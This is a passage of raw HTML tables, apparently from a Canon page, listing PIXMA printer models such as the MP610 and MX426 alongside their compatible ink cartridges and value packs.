width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA iP4200</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP7270</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP8770</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iX6770</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-755XXL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iX6870</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-755XXL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG2570S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG2577S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MG3570</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG3670</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG7570</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP160</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP170</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP180</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP228</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP237</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP245</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP258</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP276</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP287</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP460</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP476</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP486</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP496</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP497</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP500</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP520</p></td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP530</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP568</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP600</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP610</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP628</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP638</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP648</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800R</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP810</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP830</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP970</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP988</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP996</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MX308</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX328</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX338</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX347</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX366</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX426</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX876</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX886</p></td><td width=\"208\"><p>CLI-726 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-725 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-1</p></td><td width=\"208\"><p>PGI-29 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Dark Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Yellow)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-10</p></td><td width=\"208\"><p>PGI-72 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Magenta)</p></td></tr><tr><td width=\"170\">Â 